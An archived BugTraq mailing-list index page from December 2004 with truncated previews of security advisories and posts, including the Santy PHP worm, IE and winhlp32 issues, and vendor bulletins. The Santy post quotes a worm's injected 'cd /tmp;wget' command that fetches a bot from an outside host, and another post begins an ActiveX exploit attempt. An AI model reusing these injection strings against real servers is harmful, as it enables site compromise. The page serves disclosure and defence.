BugTraq Mode:
(Page 1403 of 1748)  < Prev  1398 1399 1400 1401 1402 1403 1404 1405 1406 1407 1408  Next >
Microsoft Internet Explorer SP2 Fully Automated Remote Compromise 2004-12-25
Paul (paul greyhats cjb net)


Microsoft Internet Explorer SP2 Fully Automated Remote Compromise

Dec, 21 2004

Vulnerable

----------

- Microsoft Internet Explorer 6.0

- Microsoft Windows XP Pro SP2

- Microsoft Windows XP Home SP2

Not Tested

------------------------

- Microsoft Windows 98

- Microsoft Internet

[ more ]  [ reply ]
Re: New Santy-Worm attacks *all* PHP-skripts ( Santy.c ? ) 2004-12-26
K-OTiK Security (Special-Alerts k-otik com)
In-Reply-To: <Pine.LNX.4.58.0412251805110.19888 (at) loki.ct.heise (dot) de [email concealed]>

The kids are exploiting the php file inclusion (programming flaw), well-thought-out.

Thousands of vulnerable sites and potentially thousands of zombies...

We labelled this Santy.c (even if the only similarity with Santy lies in

[ more ]  [ reply ]
New Winhlp32.exe vuln 2004-12-24
bad_son pimp it
Can this vulnerability be exploited using the HTML help ActiveX control ?

I am trying:
<OBJECT
id=winhelp
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
codebase="hhctrl.ocx#Version=5,02,3790,1194"
width=100
height=100
>
<PARAM name="Command

[ more ]  [ reply ]
CleanCache v2.19: False Sense of Security 2004-12-25
WBG Links (wbglinks gmail com)


This is a similar (if not exact) problem that I found with the program Window Washer 5.x by Web Root:

http://www.securityfocus.com/archive/1/372717

Publisher: ButtUglySoftware

Program Description: CleanCache v.2.19 will clean up your Windows computer, such as IE cache, cookies and temp dire

[ more ]  [ reply ]
New Santy-Worm attacks *all* PHP-skripts 2004-12-25
Juergen Schmidt (ju heisec de)
Hello,

the new santy version not only attacks phpBB.

It uses the brasilian Google site to find all kinds of PHP skripts.
It parses their URLs and overwrites variables with strings like:

'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget
www.visualcoders.net/spybot.txt;...

Often enough this l

[ more ]  [ reply ]
Re: phpBB Worm 2004-12-25
Zeljko Brajdic (zebrajdi inet hr)
In-Reply-To: <Pine.LNX.4.61.0412241909320.23893 (at) mailbox.prolocation (dot) net [email concealed]>

>Received: (qmail 11902 invoked from network); 24 Dec 2004 20:01:50 -0000

>Received: from outgoing.securityfocus.com (HELO outgoing2.securityfocus.com) (205.206.231.26)

> by mail.securityfocus.com with SMTP; 24 Dec 2004 20:

[ more ]  [ reply ]
Final Call for Papers & Workshops - BCS Asia 2005 2004-12-24
Anthony.zboralski (bcs2005 bellua com)
Dear Bugtraq Readers,

Final Call for Papers & Workshops - BCS Asia 2005

I just wanted to remind you that this is your last chance to send your
proposal
to cfp2005 (at) bellua (dot) com [email concealed] (abstract must be sent today; presentation slides
can be sent later.)

The Call for Workshops has been extended until the

[ more ]  [ reply ]
XSS in yacy 0.31 2004-12-24
Donato Ferrante (fdonato autistici org)

Donato Ferrante

Application: yacy
http://www.yacy.net

Version: 0.31

Bug: cross site scripting

Date: 24-Dec-2004

Author: Donato Ferrante
e-mail: fdonato (at) autistici (dot) org [email concealed]
web: www.autistici.org/fdo

[ more ]  [ reply ]
STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site scripting vulnerabilities in ZeroBoard 2004-12-24
advisory stgsecurity com


STG Security Advisory: [SSA-20041220-16] PHP source injection and cross-site

scripting vulnerabilities in ZeroBoard

Revision 1.2

Date Published: 2004-12-20 (KST)

Last Update: 2004-12-24

Disclosed by SSR Team (advisory (at) stgsecurity (dot) com [email concealed])

Summary

=======

ZeroBoard is one of widely used web

[ more ]  [ reply ]
[SECURITY] [DSA 617-1] New libtiff packages fix arbitrary code execution 2004-12-24
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 617-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
December 24th, 2004

[ more ]  [ reply ]
Re: phpBB Worm 2004-12-24
steve uptime org uk (1 replies)
In-Reply-To: <20041223125859.GE3029 (at) schlund (dot) de [email concealed]>

>This assumes you're seeing GET-requests, but there are other ways

>(e.g. POST) to exploit such code.

Whilst I understand your point, it should be noted that this vulnerability in phpBB is susceptible only to GET-based attacks: the vulnerable dat

[ more ]  [ reply ]
Re: phpBB Worm 2004-12-24
Raymond Dijkxhoorn (raymond prolocation net) (1 replies)
new phpBB worm affects 2.0.11 2004-12-24
Herman Sheremetyev (herman swebpage com)
[SECURITY] [DSA 618-1] New imlib packages fix arbitrary code execution 2004-12-24
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 618-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
December 24th, 2004

[ more ]  [ reply ]
raptor's xmas pack 2004 2004-12-22
Marco Ivaldi (raptor 0xdeadbeef info)
Hello bugtraq,

For this xmas i'm releasing some of the exploits i've developed in the
last months. Nothing so fancy, but i believe i've deployed some
new/interesting techniques, specially on the Solaris/SPARC platform.

Here's the index:

raptor_chown.c local on Linux 2.6.x < 2.6.7-rc3 (CAN-2004-0

[ more ]  [ reply ]
[Security Bulletin] SSRT4696 rev.0 - HP Tru64 UNIX TCP Stack Remote Denial of Service (DoS) 2004-12-23
Boren, Rich (SSRT) (rich boren hp com)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

HP SECURITY BULLETIN

HPSBTU01077 REVISION: 0

SSRT4696 rev.0 - HP Tru64 UNIX TCP Stack
Remote Denial of Service (DoS)

NOTICE:
There are no restrictions for distribution of this Bulletin
provided that it remains complete and inta

[ more ]  [ reply ]
[Security Bulletin] SSRT4883 rev.3 HP-UX ftp and ftpd remote unauthorized access 2004-12-23
Boren, Rich (SSRT) (rich boren hp com)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

-----------------------------------------------------------------
**REVISED 03**
Source: HEWLETT-PACKARD COMPANY
SECURITY BULLETIN: HPSBUX0107-162
Originally issued: 19 July 2001
Last Revised: 22 December 2004
SSRT4883 ftp and ftpd remote unauth

[ more ]  [ reply ]
[USN-50-1] CUPS vulnerabilities 2004-12-23
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-50-1 December 23, 2004
cupsys vulnerabilities
CAN-2004-1125, CAN-2004-2467, CAN-2004-1268, CAN-2004-1269,
CAN-2004-1270
===========================================================

A security issue affects the

[ more ]  [ reply ]
[Security Bulletin] SSRT4876 rev.0 HP Tru64 UNIX SWS (Apache) Secure Web Server Remote 2004-12-23
Boren, Rich (SSRT) (rich boren hp com)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

HP SECURITY BULLETIN

HPSBTU01106 REVISION: 0

SSRT4876 rev.0 HP Tru64 UNIX SWS (Apache) Secure Web Server Remote
Denial of Service (DoS)

NOTICE:
There are no restrictions for distribution of this Bulletin
provided that it remains c

[ more ]  [ reply ]
(Page 1403 of 1748)  < Prev  1398 1399 1400 1401 1402 1403 1404 1405 1406 1407 1408  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus